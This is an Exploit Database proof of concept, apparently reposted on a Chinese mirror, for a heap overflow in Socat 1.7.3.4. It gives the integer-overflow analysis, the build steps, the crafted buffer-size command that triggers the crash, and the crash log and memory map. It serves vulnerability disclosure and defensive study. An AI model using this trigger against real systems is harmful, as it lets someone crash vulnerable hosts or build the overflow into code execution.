Socat 1.7.3.4 – Heap-Based Overflow (PoC)

• Exploit Database
• 17 阅读

• 作者： hieubl
  日期： 2020-02-05
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47999/

• # Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)
  # Date: 2020-02-03
  # Exploit Author: hieubl from HPT Cyber Security
  # Vendor Homepage: http://www.dest-unreach.org/
  # Software Link: http://www.dest-unreach.org/socat/
  # Version: 1.7.3.4
  # Tested on: Ubuntu 16.04.6 LTS
  # CVE :
  
  # Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)
  
  ------- [***Description***] -------
  The source code of socat.c contains _socat() function which has the
  Integer Overflow vulnerability:
  int _socat(void) {
  ...
  unsigned char *buff;
  ...
  buff = Malloc(2*socat_opts.bufsiz+1)
  ...
  }
  
  After that, the the line of code "if ((bytes2 = xiotransfer(sock2,
  sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the
  xiotransfer() function. The xiotransfer() function calls xioread()
  function. Finally xioread() function calls Read() function.
  
  ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {
  
  ...
  Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to
  Heap-Based Overflow vulnerability***!!!]
  ...
  }
  
  In addition, the "Makefile" file does not turn on the Position
  Independent Executables (PIE) mitigation (the CFLAGS does not contains
  "-pie" flag). By default, Ubuntu 16.04 does not turn on this
  mitigation. Consequently, it is easier to exploit the program, may
  even lead to Remode Code Execution (RCE).
  Reference: https://hackerone.com/reports/415272, $100 bounty for Linux
  Desktop application slack executable does not use pie / no ASLR
  
  ------- [***Download and build***] -------
  Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz
  $ tar xzvf socat-1.7.3.4.tar.gz
  $ cd socat-1.7.3.4/
  $ ./configure
  Modify "Makefile" file: "CFLAGS = -g -O -D_GNU_SOURCE -Wall
  -Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (add "-g" flag for
  debugging purpose)
  $ make
  $ sudo make install
  
  ------- [***Proof of Concept***] -------
  $ checksec socat
  [*] '/home/natsu/temp/socat-1.7.3.4/socat'
  Arch: amd64-64-little
  RELRO:Partial RELRO
  Stack:Canary found
  NX: NX enabled
  PIE:No PIE (0x400000)
  FORTIFY:Enabled
  >>> There is no PIE mitigation!
  
  $ python -c 'print "A"*1000000' > a
  $ touch b
  $ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000
  
  This proof of concept triggers the bugs by setting the buffer size to
  0x8000000000000050(9223372036854775888 in decimal). Therefore, the malloc
  size is passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0.
  This is equivalent to Malloc(0xa0). The readbytes("readbytes=1000000")
  controls the size of reading (we cannot read with the size too large as
  0x8000000000000050) with these lines of code: if (pipe->readbytes) { if
  (pipe->actbytes == 0) { return 0; } if (pipe->actbytes < bufsiz) { bufsiz =
  pipe->actbytes; } } ------- [***Crash logs***] ------- *** Error in
  `socat': free(): invalid next size (normal): 0x000000000106a110 ***
  ======= Backtrace: =========
  /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]
  /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]
  /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]
  socat[0x407e3f]
  socat[0x4084c6]
  socat[0x408f7a]
  /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]
  socat[0x4057a9]
  ======= Memory map: ========
  00400000-0044a000 r-xp 00000000 08:01 655643
  /usr/local/bin/socat
  00649000-0064a000 r--p 00049000 08:01 655643
  /usr/local/bin/socat
  0064a000-0064b000 rw-p 0004a000 08:01 655643
  /usr/local/bin/socat
  0064b000-0068c000 rw-p 00000000 00:00 0
  01069000-0108a000 rw-p 00000000 00:00 0
   [heap]
  7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0
  7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0
  7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801
  /lib/x86_64-linux-gnu/libgcc_s.so.1
  7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801
  /lib/x86_64-linux-gnu/libgcc_s.so.1
  7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801
  /lib/x86_64-linux-gnu/libgcc_s.so.1
  7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787
  /lib/x86_64-linux-gnu/libdl-2.23.so
  7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787
  /lib/x86_64-linux-gnu/libdl-2.23.so
  7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787
  /lib/x86_64-linux-gnu/libdl-2.23.so
  7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787
  /lib/x86_64-linux-gnu/libdl-2.23.so
  7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909
  /lib/x86_64-linux-gnu/libpthread-2.23.so
  7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909
  /lib/x86_64-linux-gnu/libpthread-2.23.so
  7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909
  /lib/x86_64-linux-gnu/libpthread-2.23.so
  7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909
  /lib/x86_64-linux-gnu/libpthread-2.23.so
  7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0
  7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763
  /lib/x86_64-linux-gnu/libc-2.23.so
  7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763
  /lib/x86_64-linux-gnu/libc-2.23.so
  7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763
  /lib/x86_64-linux-gnu/libc-2.23.so
  7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763
  /lib/x86_64-linux-gnu/libc-2.23.so
  7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0
  7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619
  /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
  7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619
  /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
  7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619
  /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
  7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619
  /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
  7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0
  7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620
  /lib/x86_64-linux-gnu/libssl.so.1.0.0
  7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620
  /lib/x86_64-linux-gnu/libssl.so.1.0.0
  7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620
  /lib/x86_64-linux-gnu/libssl.so.1.0.0
  7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620
  /lib/x86_64-linux-gnu/libssl.so.1.0.0
  7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944
  /lib/x86_64-linux-gnu/libutil-2.23.so
  7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944
  /lib/x86_64-linux-gnu/libutil-2.23.so
  7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944
  /lib/x86_64-linux-gnu/libutil-2.23.so
  7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944
  /lib/x86_64-linux-gnu/libutil-2.23.so
  7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917
  /lib/x86_64-linux-gnu/librt-2.23.so
  7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917
  /lib/x86_64-linux-gnu/librt-2.23.so
  7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917
  /lib/x86_64-linux-gnu/librt-2.23.so
  7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917
  /lib/x86_64-linux-gnu/librt-2.23.so
  7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735
  /lib/x86_64-linux-gnu/ld-2.23.so
  7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0
  7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0
  7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735
  /lib/x86_64-linux-gnu/ld-2.23.so
  7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735
  /lib/x86_64-linux-gnu/ld-2.23.so
  7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0
  7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0
   [stack]
  7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0
   [vvar]
  7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0
   [vdso]
  ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0
   [vsyscall]
  2020/02/04 05:33:00 socat[47233] E exiting on signal 6